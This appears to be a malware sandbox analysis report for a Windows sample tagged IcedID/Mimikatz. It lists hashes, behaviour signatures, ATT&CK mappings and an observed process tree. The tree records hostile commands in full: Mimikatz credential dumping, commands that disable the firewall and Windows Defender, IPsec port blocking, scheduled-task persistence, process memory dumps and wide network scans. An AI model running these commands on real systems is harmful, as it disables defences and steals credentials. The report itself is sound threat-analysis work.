Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
18-06-2024 11:10
General
-
Target
2024-06-18_f862fafa4bc785b3c61886eeb98d18e3_hacktools_icedid_mimikatz.exe
-
Size
7.9MB
-
MD5
f862fafa4bc785b3c61886eeb98d18e3
-
SHA1
ff2c8afcc49fdd1748dbf8bd9b177509bf0364f2
-
SHA256
43df0d27209b33aa353f4301ff66715a240261dcd7dee13dc41d24a454433eae
-
SHA512
5ae760bc6b108e4fa5004bee11a6457b068438c6780aea18bb51f6a203fe9020732ca6526e5e24cd36d13631e370585e892e348622e45422547ad5f24e55341c
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (44901) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 39 IoCs
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 10 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 59 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 44 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\nesaytpkd\pltlgr.exe"C:\Windows\TEMP\nesaytpkd\pltlgr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-06-18_f862fafa4bc785b3c61886eeb98d18e3_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-06-18_f862fafa4bc785b3c61886eeb98d18e3_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ttkvkbmd\imbmiqm.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\ttkvkbmd\imbmiqm.exeC:\Windows\ttkvkbmd\imbmiqm.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\ttkvkbmd\imbmiqm.exeC:\Windows\ttkvkbmd\imbmiqm.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\cgttatica\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\tlncbkkly\cgttatica\wpcap.exeC:\Windows\tlncbkkly\cgttatica\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tlncbkkly\cgttatica\Scant.txt2⤵
-
C:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exeC:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tlncbkkly\cgttatica\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tlncbkkly\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\tlncbkkly\Corporate\vfshost.exeC:\Windows\tlncbkkly\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kkgiytzip" /ru system /tr "cmd /c C:\Windows\ime\imbmiqm.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kkgiytzip" /ru system /tr "cmd /c C:\Windows\ime\imbmiqm.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ttbmdbvia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ttbmdbvia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dmctgkgcm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dmctgkgcm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 776 C:\Windows\TEMP\tlncbkkly\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1016 C:\Windows\TEMP\tlncbkkly\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1752 C:\Windows\TEMP\tlncbkkly\1752.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tlncbkkly\cgttatica\scan.bat2⤵
-
C:\Windows\tlncbkkly\cgttatica\parwdbukn.exeparwdbukn.exe TCP 24.180.0.1 24.180.255.255 445 512 /save3⤵
- Executes dropped EXE
-
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2576 C:\Windows\TEMP\tlncbkkly\2576.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2760 C:\Windows\TEMP\tlncbkkly\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2808 C:\Windows\TEMP\tlncbkkly\2808.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3116 C:\Windows\TEMP\tlncbkkly\3116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3912 C:\Windows\TEMP\tlncbkkly\3912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4004 C:\Windows\TEMP\tlncbkkly\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4072 C:\Windows\TEMP\tlncbkkly\4072.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1400 C:\Windows\TEMP\tlncbkkly\1400.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 5068 C:\Windows\TEMP\tlncbkkly\5068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1616 C:\Windows\TEMP\tlncbkkly\1616.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4840 C:\Windows\TEMP\tlncbkkly\4840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 448 C:\Windows\TEMP\tlncbkkly\448.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4708 C:\Windows\TEMP\tlncbkkly\4708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2772 C:\Windows\TEMP\tlncbkkly\2772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3908 C:\Windows\TEMP\tlncbkkly\3908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\iaacws.exeC:\Windows\SysWOW64\iaacws.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\imbmiqm.exe1⤵
-
C:\Windows\ime\imbmiqm.exeC:\Windows\ime\imbmiqm.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\imbmiqm.exe1⤵
-
C:\Windows\ime\imbmiqm.exeC:\Windows\ime\imbmiqm.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.6MB
MD53a4ea342d4133bd0539865095ff12382
SHA1731da858895b9a1f0ddb751e9e24b0e1b9eb3b73
SHA2564ff7cc6143820317373ac07502158d6b250a338a33901f83dd274fe1e66022d5
SHA5124ea2031703dfd5b0cfba8c258c858a44fc918a817b6bdae29a4dd4094a2f0558933732b419e382d230668e6956dff3014299ffd6bd629bb71a532732a43fed07
-
Filesize
45.4MB
MD542b91b25290276bc7a5e776ba973beff
SHA105828cea348d2a1d71320eade6c76427e99dbfd5
SHA256dd2b78736fdaa129e735053f3d8518e9799fba8eb8a47d17fae65925913c5b98
SHA5124fe89579267b26f4d6f48e20cf3ddf03b15ed7f5556103e2dd60b9451fecfdc62b932976eb2d73306500abf806ef25f92d511f0d01dc3e5e9f058d50ea8a139d
-
Filesize
4.1MB
MD5aae74fe441c0051fc4b8947897807ae9
SHA1c61e5f325831f200111579502212c5441f133a59
SHA25604f84c4200ce87497773f3f280e8244009f25f60b482ec901726c63905894724
SHA512a840beb7b964bd54147966a0b80125b7d4be5a61adb04cf2cba9a0ddaec52853044807ecbe7467139fc8637281fdec8af4a391a74d3bb173b9645b9baaa75ae8
-
Filesize
3.6MB
MD5514013f294be7de489f61745ede61862
SHA11919e265e88fec37f4957e7c46b740440bc3254e
SHA256e7cc98ae43484c4fdb5a28d27203e66dec6a6442d222a8cfad7fb6de17785734
SHA512949595ec3e4628dc9c4300e3ea4c570c7d8ff74557da2b011649bf5f882ed1e1535fec15774ba21df3ad511628708289db57a6bd965473a1c326d203d430ee9f
-
Filesize
2.9MB
MD5b561bbb951761ebe026217b857455968
SHA1ac22de0621868c17f1684962537459a09e80a210
SHA2562fd5c7cdde5a15c2021e7dd53aadc42e360ecdda6cfdd5e0f6d8c63f9ba27d1e
SHA512b482d7d2955b05b488c0cb295182c8d97fb2d03bec1f5aa18e1bbe32c6c363f4066811b794901d8bc737820a99907d236c3c347adaa369b5b1d00ab6ccb539c6
-
Filesize
7.4MB
MD52fa67bcede2037a37c96b95d95212c82
SHA1fb9990a8646d69add8ad175a28837867f2cd8ef1
SHA256006b5aef50e7570cb4c568e35a867654017152afe1e0cfc8403550083a0f667b
SHA51279f1ce46155e1eaa82ca5c74690489bd8d5d21fc56a7a51ac55a63154052a0e046db5fa18ecfe4351810e5acda2e8f4652c6b85b3cf74765d00153d5d8f34b61
-
Filesize
818KB
MD5b98a790889dec773b1d74851661dc4ae
SHA144dff0e2c82bddb20a01d70bfdff621b54c5600e
SHA256c3db6b3a4939e6c25e070c991b07a52b92267626f2748e13fb0e77ed83130ace
SHA512e546798689b4d8d7de461db320969b611b6e17393f0fc84f63dd0cb715604d868e3ef223b9a1cf1a26e9ed54225826380681c86ecb61d4848a7de5bc947aba88
-
Filesize
2.3MB
MD5f1854c7e422318fb6ea01c9553805acf
SHA1d195cc1ce2b6d22bf3c1b79c075451e4042fa671
SHA256c60684e112716d765e1a3e7af28487d786f5f13e74653f1eef0a415141452409
SHA51241f6bf866d36873331a16dbfb49032324524edfaa9696faecac01ffa32cb020ea95ecdd1c951a6c293eaf629a365a8152c74a568716ca41d1252b13132940b21
-
Filesize
20.8MB
MD5aec1ce15669a43b9b52e56fb07f999a8
SHA164af56e875deaeaed1b8ee8789d1d4eaa26ae57e
SHA2566f817d83a542dbfb9ba1609e87a95840cf734089aa619e58afc0327d5b3d4e31
SHA5121122526704f7bff1902841f0a11629c8475039c36cf458966e9d4885d687801cc3b267503a41981262687026b344c5e21a8dc0b25d76d643e7d15d63943f3045
-
Filesize
4.2MB
MD50117187e248ec452756e2adac254a9d4
SHA1ceca2b89b6a6bc360e4fc62e33afa143b57a6614
